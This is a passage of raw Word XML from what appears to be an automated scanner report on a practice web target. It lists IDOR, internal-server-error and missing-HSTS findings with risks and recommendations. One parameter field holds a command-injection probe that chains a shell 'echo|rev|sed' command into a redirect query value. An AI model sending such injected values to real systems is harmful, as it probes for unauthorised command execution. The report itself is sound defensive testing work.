                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D41167B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="0508536A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B74BE1C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We identified a parameter that uses numerical values to access resources, potentially leading to Insecure Direct Object References (IDOR) vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ADFF48" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06272F19" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The vulnerability allows attackers to brute-force parameter values to uncover and access unauthorized resources and functionalities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28467F91" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33989AF8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Ensure that parameter values would not reveal sensitive information and that the application properly checks the user's authorization to access the resource. Also, the resource IDs should not be predictable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007DE5E7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E97F2B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId102">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Testing for Insecure Direct Object References</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30C093ED"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0C9F8290"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66F7C157" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49C10311" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5D50FBAE" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E608A8E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38B044ED" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId103">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-284</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="340D0911" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06D43C46" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1718F8CA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId104">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A5 - Broken Access Control</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6DEDDAE2" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7321A70A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D1230FA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId105">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A1 - Broken Access Control</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58F2F7E0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1C3C3D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="989898"/>
        </w:rPr>
        <w:t>✘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0BC4E9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.14 Internal Server Error Found </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="32072107" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D8E0E4A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DC6F915" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="054E906C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39BDB83B" wp14:editId="3E51859A">
                  <wp:extent cx="1397000" cy="1397000"/>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3997794D" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="568AE04F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="28CC1D94" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03156434"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016"/>
        <w:gridCol w:w="6834"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7BBA2D7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6B1E193" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5127B792"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06">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/low.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3DF7FA4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06FD8E5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DE0A3C7"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7D9A09E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D49990F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B81CCC9"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Query:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>redirect=info.php?id=2;echo ttp1739356088.1073|rev|sed -e 's/^/ptt/' -e 's/\./dot/'|tr a-z A-Z #';echo ttp1739356088.1073|rev|sed -e 's/^/ptt/' -e 's/\./dot/'|tr a-z A-Z #";echo ttp1739356088.1073|rev|sed -e 's/^/ptt/' -e &amp;...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4A49C64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97B607A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D30F593" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Response has an internal server error status code: 500</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId107">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B490670" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="0B88AC57" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15483B2F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We noticed that the target application's website does not properly handle or incorrectly manages exceptional conditions like Internal Server Errors. These errors can reveal sensitive information through their error messages. For instance, an error message could inadvertently disclose system paths or private application details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1328AF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0C744C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">The risk exists that attackers could utilize information revealed in Internal Server Error messages to mount more targeted and effective attacks. Detailed error messages </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>could, for example, expose a path traversal weakness (CWE-22) or other exploitable system vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D686B1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF9EA2C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Ensure that error messages only contain minimal details that are useful to the intended audience, and nobody else. The messages need to strike the balance between being too cryptic and not being cryptic enough. They should not necessarily reveal the methods that were used to determine the error. Such detailed information can be used to refine the original attack to increase the chances of success. If errors must be tracked in some detail, capture them in log messages - but consider what could occur if the log messages can be viewed by attackers. Avoid recording highly sensitive information such as passwords in any form. Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a username is valid or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27998AD4"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4E1684F8"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86FAF9F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FB140F9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="10B2A12A" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50F80951" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="568A3F7E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId108">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-209</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3D1EA390" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FDD7A50" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EAA0F6D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId109">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A6 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4A769AD4" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B75926B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="487EFB2C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId110">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A5 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="431E9AAC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0820824B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="587F3A70" wp14:editId="23F1BE32">
            <wp:extent cx="5852160" cy="3291840"/>
            <wp:effectExtent l="0" t="0" r="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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5852160" cy="3291840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62332780" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Figure 1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Internal Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7F3270" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBEE3D5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F37207F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E671DE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.15 Missing security header: Strict-Transport-Security </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="05FB2178" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33AB214C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47293DAC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="142FB9E4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C1A4009" wp14:editId="661751C3">
                  <wp:extent cx="1397000" cy="1397000"/>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1BCAC273" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E3FB092" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="3C657874" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C92741E"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62107F45"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297D8189" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EDF280E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4D29F5FD" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DEF6045" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId112">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="534D079D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Response headers do not include the HTTP Strict-Transport-Security header</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId113">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DCED096" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6224F6FD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We noticed that the target application lacks the HTTP Strict-Transport-Security header in its responses. This security header is crucial as it instructs browsers to only establish secure (HTTPS) connections with the web server and reject any HTTP connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F242259" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68469363" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk is that lack of this header permits an attacker to force a victim user to initiate a clear-text HTTP connection to the server, thus opening the possibility to eavesdrop on the network traffic and extract sensitive information (e.g. session cookies).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76911BBF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E265F9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">The Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows: </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>Strict-Transport-Security: max-age=&lt;seconds&gt;[; includeSubDomains]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">The parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>max-age</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>includeSubDomains</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> defines that the policy applies also for sub domains of the sender of the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036ED767"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26CE998B"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E4A4B01" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="132C553C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="12192AA4" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EE52C8E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18EB333B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId114">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-693</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="36130011" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
